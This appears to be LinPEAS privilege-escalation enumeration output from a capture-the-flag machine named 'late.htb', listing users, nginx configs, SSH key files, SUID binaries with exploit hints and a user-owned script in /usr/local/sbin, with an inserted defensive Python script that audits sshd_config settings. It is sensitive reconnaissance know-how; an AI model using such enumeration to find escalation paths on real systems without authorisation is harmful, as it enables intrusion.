uid=117(pulse) gid=121(pulse) groups=121(pulse),29(audio)
uid=118(geoclue) gid=123(geoclue) groups=123(geoclue)
uid=119(smmta) gid=124(smmta) groups=124(smmta)
uid=120(smmsp) gid=125(smmsp) groups=125(smmsp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Login now
20:18:48 up 8:40, 0 users, load average: 0.51, 0.15, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
reboot system boot Fri Apr 29 11:38:30 2022 still running 0.0.0.0
wtmp begins Fri Apr 29 11:38:30 2022
╔══════════╣ Last time logon each user
Username Port From Latest
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                       ╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠══════════════════════════════════════
                                       ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii bcc 0.16.17-3.3 amd64 16-bit x86 C compiler
ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler
/usr/bin/gcc
╔══════════╣ Searching mysql credentials and exec
Potential file containing credentials:
-rw-r--r-- 1 root root 641 Sep 27 2018 /etc/apparmor.d/abstractions/mysql
# ------------------------------------------------------------------
# Copyright (C) 2002-2006 Novell/SUSE
# Copyright (C) 2013 Christian Boltz
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License published by the Free Software Foundation.
# ------------------------------------------------------------------
/var/lib/mysql{,d}/mysql{,d}.sock rw,
/{var/,}run/mysql{,d}/mysql{,d}.sock rw,
/usr/share/{mysql,mysql-community-server,mariadb}/charsets/ r,
/usr/share/{mysql,mysql-community-server,mariadb}/charsets/*.xml r,
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
httpd Not Found
Nginx version:
╔══╣ Nginx modules
ngx_http_geoip_module.so
ngx_http_image_filter_module.so
ngx_http_xslt_filter_module.so
ngx_mail_module.so
ngx_stream_module.so
╔══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Jan 5 14:39 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name late.htb;
    location / {
        try_files $uri $uri/ =404;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name images.late.htb;
    access_log /var/log/nginx/application.access.log;
    error_log /var/log/nginx/appliation.error.log;
    location / {
        include proxy_params;
        proxy_pass http://127.0.0.1:8000;
    }
}
╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1051 Jan 20 14:41 /etc/nginx/fastcgi_params
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 8 12:26 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Wifi Connections Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/NetworkManager/system-connections
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/ldap
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /usr/share/sendmail/examples/ldap
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw------- 1 svc_acc svc_acc 1679 Apr 7 11:08 /home/svc_acc/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material removed]
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 svc_acc svc_acc 394 Apr 7 11:08 /home/svc_acc/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp7ldYUpWqV4LJ/M+jgex9FHy4X8//dOf5+IBQeGca8EEDKsweI/dL8Oep0gfa6pNd0+Th4Z1fKfMycVHNthv5wFr5HxP+dNrc9K5H22SKqFdNoQ5uCNFLKevY24NY9CFfw6aEAp0mFl8StlRxvGK6dysqegKVktDplkNo1O1NTClRoyL+a1ofMsgPUpOX51QWwtBiZ1FQDrf3GTPVi8MXk5sgOh4eA5TutlXhOoDqzqAjtbt3Xfszc6LZZNZEHNxZMAzB9InZwS229L8CcT8HYR6WPWyFhRm4/IiguFIyJwaeEHvsgqll5D4yCSxFwcnl8naG9O79PfIv22CB/0Ox svc_acc@late
-rw-rw-r-- 1 svc_acc svc_acc 394 Apr 7 11:08 /home/svc_acc/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp7ldYUpWqV4LJ/M+jgex9FHy4X8//dOf5+IBQeGca8EEDKsweI/dL8Oep0gfa6pNd0+Th4Z1fKfMycVHNthv5wFr5HxP+dNrc9K5H22SKqFdNoQ5uCNFLKevY24NY9CFfw6aEAp0mFl8StlRxvGK6dysqegKVktDplkNo1O1NTClRoyL+a1ofMsgPUpOX51QWwtBiZ1FQDrf3GTPVi8MXk5sgOh4eA5TutlXhOoDqzqAjtbt3Xfszc6LZZNZEHNxZMAzB9InZwS229L8CcT8HYR6WPWyFhRm4/IiguFIyJwaeEHvsgqll5D4yCSxFwcnl8naG9O79PfIv22CB/0Ox svc_acc@late
PermitRootLogin no
PubkeyAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
╔══╣ Possible private SSH keys were found!
/home/svc_acc/.ssh/id_rsa
╔══╣ Some certificates were found (out limited):
/etc/mail/tls/sendmail-client.crt
/etc/mail/tls/sendmail-server.crt
/etc/pollinate/entropy.ubuntu.com.pem
8994PSTORAGE_CERTSBIN
gpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent'
gpg-connect-agent: waiting for the agent to come up ... (5s)
gpg-connect-agent: waiting for the agent to come up ... (4s)
gpg-connect-agent: connection to agent established
╔══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
╔══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
sendmail: all
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
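The sshd_config lines above are what LinPEAS greps out of the file, and the one that matters here is `PasswordAuthentication yes`. A grep does not tell you the effective value, because sshd applies the first occurrence of each keyword and ignores later duplicates (sshd_config(5)), so a hardening line appended at the bottom of the file changes nothing. The following is an added example, not part of this output or of LinPEAS, that parses a config with that first-wins rule and reports risky effective values. The sample config is constructed from the directives shown above plus a trailing `PasswordAuthentication no` and a `Match` block to show where the global parse stops; it assumes a self-contained file (no `Include`).

```python
import re

# Directives whose listed value widens the SSH attack surface.
# Key: lowercase directive; value: (risky value, why it matters).
RISKY = {
    "passwordauthentication": ("yes", "password logins accepted: brute force and credential reuse reach every account with a shell"),
    "permitrootlogin": ("yes", "direct root login over SSH is allowed"),
    "permitemptypasswords": ("yes", "accounts with an empty password can log in"),
    "x11forwarding": ("yes", "a compromised server can reach the client's X display"),
}

# "Keyword value" or "Keyword=value"; comments are stripped before matching.
_DIRECTIVE = re.compile(r"^([A-Za-z0-9]+)[\s=]+(.+?)\s*$")


def effective_settings(text):
    """Parse the global section of an sshd_config the way sshd does:
    for each keyword the FIRST value wins. Parsing stops at the first
    'Match' block, whose settings are conditional and are not global.
    'Include' is not expanded (assumption: self-contained file)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).lower()
        if key == "match":
            break
        settings.setdefault(key, value)   # later duplicates are ignored
    return settings


def audit(text):
    """Return [(directive, effective_value, reason)] for risky effective values."""
    settings = effective_settings(text)
    return [(key, settings[key], why)
            for key, (bad, why) in RISKY.items()
            if settings.get(key) == bad]


# Constructed sample: the directives LinPEAS printed above, plus a late
# 'PasswordAuthentication no' that does NOT take effect, and a Match block.
SAMPLE = """\
PermitRootLogin no
PubkeyAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
PasswordAuthentication no   # appended later by an admin; ignored by sshd
Match User svc_acc
    PasswordAuthentication no
"""

if __name__ == "__main__":
    for key, value, why in audit(SAMPLE):
        print("%s = %s: %s" % (key, value, why))
```

Run it against the real file with `audit(open("/etc/ssh/sshd_config").read())` when it is readable; on the host above it is world-readable, which is the default. Anything inside a `Match` block needs separate treatment, since it only applies to the matched users or addresses.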
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /etc/pam.d
-rw-r--r-- 1 root root 2219 Jan 14 13:56 /etc/pam.d/sshd
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux 2.6
/tmp/tmux-1000
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3759 Mar 24 15:49 /etc/cloud/cloud.cfg
lock_passwd: True
╔══════════╣ Analyzing Keyring Files (limit 70)
drwx------ 2 svc_acc svc_acc 4096 Jan 16 18:58 /home/svc_acc/.local/share/keyrings
drwxr-xr-x 3 root root 4096 Jan 12 09:31 /usr/lib/python2.7/dist-packages/keyrings
drwxr-xr-x 3 root root 4096 Apr 7 13:51 /usr/lib/python3/dist-packages/keyrings
drwxr-xr-x 2 root root 4096 Apr 7 13:51 /usr/share/keyrings
-rw------- 1 svc_acc svc_acc 105 Jan 16 18:58 /home/svc_acc/.local/share/keyrings/login.keyring
-rw------- 1 svc_acc svc_acc 0 Jan 16 18:58 /home/svc_acc/.local/share/keyrings/user.keystore
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 355 Jan 5 12:16 /etc/apt/trusted.gpg.d/alex-p_ubuntu_tesseract-ocr-devel.gpg
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 16 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Mar 21 2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg
drwx------ 3 svc_acc svc_acc 4096 Apr 29 20:18 /home/svc_acc/.gnupg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 35208587 Apr 29 17:42 /var/log/nginx/access.log
-rw-r--r-- 1 root root 195 Apr 29 15:32 /var/log/nginx/error.log
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 24 Jan 14 08:42 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 56 Jan 14 08:42 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc
-rw-r--r-- 1 svc_acc svc_acc 3771 Apr 4 2018 /home/svc_acc/.bashrc
-rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile
-rw-r--r-- 1 svc_acc svc_acc 807 Apr 4 2018 /home/svc_acc/.profile
╔═══════════════════╗
═══════════════════╣ Interesting Files ╠═══════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-- 1 root dip 370K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 10K Jan 13 2018 /usr/sbin/sensible-mda (Unknown SUID binary)
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 59K Jan 25 16:26 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40K Jan 25 16:26 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 146K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /usr/bin/chsh
-rwsr-xr-x 1 root root 22K Jun 28 2019 /usr/bin/arping
-rwsr-sr-x 1 root mail 95K Nov 16 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 427K Mar 3 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14K Jan 12 12:34 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /bin/su
-rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996)
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall
-rwxr-sr-x 1 root shadow 23K Jan 25 16:26 /usr/bin/expiry
-rwxr-sr-x 1 root mail 18K Nov 16 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root ssh 355K Mar 3 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 71K Jan 25 16:26 /usr/bin/chage
-rwsr-sr-x 1 root mail 95K Nov 16 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 3 root mail 15K Apr 21 2017 /usr/bin/mail-lock
-rwxr-sr-x 1 root mail 18K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mail 11K Nov 7 2017 /usr/bin/dotlock.mailutils
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 3 root mail 15K Apr 21 2017 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root crontab 39K Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 3 root mail 15K Apr 21 2017 /usr/bin/mail-unlock
-rwxr-sr-x 1 root smmsp 845K Jan 13 2018 /usr/lib/sm.bin/sendmail ---> Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_(SGI_ProPack_1.2/1.3)
-rwxr-sr-x 1 root smmsp 77K Jan 13 2018 /usr/lib/sm.bin/mailstats (Unknown SGID binary)
-rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
You own the script: /usr/local/sbin/ssh-alert.sh
/usr/bin/gettext.sh
╔══════════╣ Unexpected in root
/initrd.img
/initrd.img.old
/vmlinuz.old
/vmlinuz
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files
total 48
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 652 Apr 3 2019 input-method-config.sh
-rw-r--r-- 1 root root 1941 Jul 16 2018 vte-2.91.sh
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
-rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh
-rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/svc_acc/app/templates/footer.html
/home/svc_acc/app/templates/result.html
/home/svc_acc/app/templates/header.html
/home/svc_acc/app/templates/index.html
/home/svc_acc/app/__pycache__
/home/svc_acc/app/__pycache__/main.cpython-36.pyc
/home/svc_acc/app/__pycache__/wsgi.cpython-36.pyc
/home/svc_acc/app/static/css
/home/svc_acc/app/static/css/style.min.css
/home/svc_acc/app/static/css/mdb.css
/home/svc_acc/app/static/css/modules
/home/svc_acc/app/static/css/modules/animations-extended.css
/home/svc_acc/app/static/css/modules/animations-extended.min.css
/home/svc_acc/app/static/css/style.css
/home/svc_acc/app/static/css/bootstrap.css
/home/svc_acc/app/static/css/mdb.lite.min.css
/home/svc_acc/app/static/css/mdb.min.css
/home/svc_acc/app/static/css/addons
/home/svc_acc/app/static/css/addons/directives.min.css
/home/svc_acc/app/static/css/addons/datatables.min.css
/home/svc_acc/app/static/css/addons/datatables-select.css
/home/svc_acc/app/static/css/addons/datatables-select.min.css
/home/svc_acc/app/static/css/addons/directives.css
/home/svc_acc/app/static/css/addons/datatables.css
/home/svc_acc/app/static/css/bootstrap.min.css
/home/svc_acc/app/static/css/mdb.lite.css
/home/svc_acc/app/static/img
/home/svc_acc/app/static/img/overlays
/home/svc_acc/app/static/img/overlays/01.png
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/svc_acc
/home/svc_acc/app
/home/svc_acc/app/static
/home/svc_acc/app/templates
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root svc_acc 33 Apr 29 11:38 /home/svc_acc/user.txt
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/svc_acc/.gnupg/pubring.kbx
/home/svc_acc/.gnupg/trustdb.gpg
/home/svc_acc/.config/lxc/config.yml
/usr/local/sbin/ssh-alert.sh
/var/log/kern.log
/var/log/syslog
/var/log/journal/68ed0714af124461afecf837a54c1b73/user-1000.journal
/var/log/journal/68ed0714af124461afecf837a54c1b73/system.journal
/var/log/nginx/application.access.log
/var/log/nginx/appliation.error.log
/var/log/auth.log
/var/log/mail.log
/var/mail/root
╔══════════╣ Writable log files (logrotten) (limit 100)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
╔══════════╣ Files inside /home/svc_acc (limit 20)
total 804
drwxr-xr-x 8 svc_acc svc_acc 4096 Apr 29 20:18 .
drwxr-xr-x 3 root root 4096 Jan 5 10:44 ..
drwxrwxr-x 7 svc_acc svc_acc 4096 Apr 29 20:17 app
lrwxrwxrwx 1 svc_acc svc_acc 9 Jan 16 18:45 .bash_history -> /dev/null
-rw-r--r-- 1 svc_acc svc_acc 3771 Apr 4 2018 .bashrc
drwx------ 3 svc_acc svc_acc 4096 Apr 7 13:51 .cache
drwxr-x--- 3 svc_acc svc_acc 4096 Apr 29 20:18 .config
drwx------ 3 svc_acc svc_acc 4096 Apr 29 20:18 .gnupg
-rwxr-xr-x 1 svc_acc svc_acc 776167 Apr 29 20:18 linpeas.sh
drwxrwxr-x 5 svc_acc svc_acc 4096 Jan 5 12:13 .local
-rw-r--r-- 1 svc_acc svc_acc 807 Apr 4 2018 .profile
drwx------ 2 svc_acc svc_acc 4096 Apr 7 11:08 .ssh
-rw-r----- 1 root svc_acc 33 Apr 29 11:38 user.txt
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
sendmail
sendmail-msp
sendmail-mta
╔══════════╣ Mails (limit 50)
82571 4 -rw------- 1 root mail 2664 Apr 29 20:18 /var/mail/root
82571 4 -rw------- 1 root mail 2664 Apr 29 20:18 /var/spool/mail/root
╔══════════╣ Backup folders
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 57 Mar 5 2014 /usr/share/sendmail/cf/siteconfig/uucp.old.arpa.m4
-rw-r--r-- 1 root root 1758 Mar 24 2020 /usr/share/sosreport/sos/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1397 Aug 6 2020 /usr/share/sosreport/sos/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc
-rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 14182 Apr 18 12:05 /usr/share/info/dir.old
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz
-rwxr-xr-x 1 root root 1513 Oct 20 2013 /usr/share/doc/libipc-system-simple-perl/examples/rsync-backup.pl
-rw-r--r-- 1 root root 2505 Apr 15 2018 /usr/share/help/C/gnome-help/backup-what.page
-rw-r--r-- 1 root root 3318 Apr 15 2018 /usr/share/help/C/gnome-help/backup-thinkabout.page
-rw-r--r-- 1 root root 1320 Apr 15 2018 /usr/share/help/C/gnome-help/backup-restore.page
-rw-r--r-- 1 root root 2356 Apr 15 2018 /usr/share/help/C/gnome-help/backup-how.page
-rw-r--r-- 1 root root 1262 Apr 15 2018 /usr/share/help/C/gnome-help/backup-why.page
-rw-r--r-- 1 root root 1815 Apr 15 2018 /usr/share/help/C/gnome-help/backup-check.page
-rw-r--r-- 1 root root 1999 Apr 15 2018 /usr/share/help/C/gnome-help/backup-frequency.page
-rw-r--r-- 1 root root 2268 Apr 15 2018 /usr/share/help/C/gnome-help/backup-where.page
-rw-r--r-- 1 root root 35544 Mar 25 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 217574 Mar 24 16:53 /usr/src/linux-headers-4.15.0-175-generic/.config.old
-rw-r--r-- 1 root root 0 Mar 24 16:53 /usr/src/linux-headers-4.15.0-175-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Mar 24 16:53 /usr/src/linux-headers-4.15.0-175-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 8881 Mar 24 16:53 /lib/modules/4.15.0-175-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9081 Mar 24 16:53 /lib/modules/4.15.0-175-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root smmsp 65205 Jan 14 11:11 /var/backups/sendmail.cf.bak
-rw-r--r-- 1 root smmsp 44599 Jan 14 10:20 /var/backups/submit.cf.bak
-rw-r--r-- 1 root smmsp 2375 Jan 14 10:20 /var/backups/submit.mc.bak
-rw-r--r-- 1 root smmsp 4209 Jan 14 10:20 /var/backups/sendmail.mc.bak
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found: /etc/mail/access.db: regular file, no read permission
